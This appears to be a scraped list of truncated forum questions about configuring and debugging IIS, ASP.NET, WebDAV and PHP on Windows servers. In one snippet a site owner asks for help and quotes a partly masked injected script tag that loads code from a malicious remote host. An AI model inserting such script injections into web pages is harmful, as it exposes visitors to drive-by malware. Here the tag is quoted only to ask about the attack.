I am running Windows Server 2008 SP2. I have an IIS 7.0 Webserver installed running IIS Media Services Beta 1. I also have WebDAV 7.5 installed.
I encoded a video file, MP4(H.264/AAC), to the smooth streaming protocol using Expression Encoder 4.0 Pro. Under "Default Web Site" I added a virtual directory to the encoded video and created ...
I have two custoerms I work on. I have one development machine (Win 7 Ultimate and Visual Studio 2010 Ultimate). For both customers I have developed websites using ASP.NET MVC. All that is cool until I try to have both website set up in IIS 7 and want to have them both F5 debuggable. Oh and did I mention both sites require that I develop...
I've a problem with adding jQuery to an ASP.NET MVC application. I add jquery to Site.Master like that:
<script src="../../Scripts/jquery-1.4.1.js" type="text/javascript"></script>
In Visual Studio 2010 this is o.k. - now I publish a application to a web server (IIS 7) an a Folder like:
h ttp://localhost/AnApplication
When calling...
hey,
i need to setup a Unique asp.net 2 application in godaddy hosting account
in this appliation the global.asax catch all the requests that access to the application domains for example:
www.domain.com/aaa.jpg -> go to the global.asax
www.domain.com/adsads/asdsad/sdsa.pdf go to the global.asax
i need to directe all incoming requests ...
Hello,
I get the above error when trying to run my .net app as it attempts to connect to a SQL database on another server.
The SQL connection string is using a trusted connection.
IIS has anonymous access switched off, and integrated windows authentication switched on.
The user the error relates to is "DOMAINNAME\IISSERVERNAME$"
Do I...
I have installed IIS on my windows7 but it is some problems with it. I successfully can open html files like (http)://localhost/index.html , but can't open ASP site: (http)://localhost/ProjectList.aspx
HTTP Error 404.3 - Not Found
The page you are requesting cannot be served because of the extension configuration. If the page is a scrip...
How can I do many to one certificate mapping to a user from a custom user database on IIS 6. I don't want to use the domain users to be mapped with these certificates. Do I have to do this using code?
...
Hi,
we are running a complex 64-bit ASP.NET 2.0 application on W2008 R2 Standard and stress tests done with VS2008 Team System have indicated that integrated pipeline mode is 30% slower than classic mode.
We have compared the application traces extensively and it appears that integrated mode is uniformly slower than classic. That is, t...
Do you do local development/debugging with the internal webserver or a local iis install? I'm currently running the internal VS2010 webserver but it's so slow it hurts. I can see the page rendering in front of me...
...
Hi,
I have a website set up as an FTP server too.
I want to use the FTP server to allow to access content from a folder outside the root.
I guess this could set up easily by adding a virtual directory. Problem is that I dont want the users to see this outside folder by browsing to the site by http.
Is this possible?
Thanks
...
I maintain a web application that is painful to upgrade. It's not painful because the code is bad, but because there are a lot of devices connected to this application via the web and getting them to update their clients is a lot like moving concrete.
So I had an idea that I could simply present a different version of the application t...
Hi,
what i am trying is the following:
I got an MVC app. running DIRECTLY in "Default Web Site"...
I got another app. ( ProductionService ) which is anotehr standalone app..
Looks like this in IIS-Manager:
My problem is, that a requets to "ProductionService" is not routed to the app., but instead is handled by the MVC-app. runnin...
We have a WCF click-once install application being served from an IIS website over HTTPS. It is in a subdirectory of another site which does have authenticaton (Mixed mode, both windows and form) but not applied to this folder. It also has a very high duration static cache configured, which caused us issues with our WCF app so we disable...
I cannot install PHP-CURL on IIS. I think I have tried everything.
My phpinfo() output does not list cURL as available.
I have C:\PHP in my path and working correctly.
I have edited the registry to read from C:\PHP\php.ini. phpinfo() output shows the correct .ini path loaded.
I have uncommented 'extension=php_curl.dll'
I have ssleay32.d...
This MSDN article states that:
To guarantee optimal performance,
aspnet_isapi uses asynchronous named
pipes to forward requests to the
worker process and to get responses.
On the other hand, the worker process
exploits synchronous pipes when it
needs to query for information about
the IIS environment (that is, server
...
When IIS restarts an ASP.Net (2.0) web application, it can either:
Recycle the AppDomain: Unload the AppDomain and load a new AppDomain on the same process (e.g. when HttpRuntime.UnloadAppDomain() is called, when web.config is changed).
Recycle the process: unload the AppDomain and load a new one on a new process (e.g. when invoking Re...
Did anybody know more information about this attack ?
I recently got this script injected in my web sites
By the way dont go on this web site since it's the source of the infection
</title><script src=http://google-stats50.**fo/***.php>
What kind of attack is it, SQL or CODE ?
By the way dont go on this web site since it's the ...
Hi,
I have a page that does an AJAX request. This request can take a while to complete, sometimes over a minute. This is not an issue.
During the AJAX request I am unable to load any other pages on the website. This is the same for any web browser.
I understand that there are connection limits in the browser, IIS and ASP.NET - but all...
I've just tried to deploy my first web application to IIS on my Windows 7 Home Premium notebook. After creating the application, I had to change to the Classic App Pool, then set that pool for framework 4.0. Now I get the following error:
HTTP Error 404.17 - Not Found
The requested content appears to be script and will not be served b...
I had a base Windows XP with IIS hosting some websites and it has been working for years, yesturday I upgraded to SP2 (which includes the security suit) because I needed .NET 3.5 and since then no one can access the web pages anymore.
When I connect to the macine locally and try to access the webpage it prompted me for a username / pass...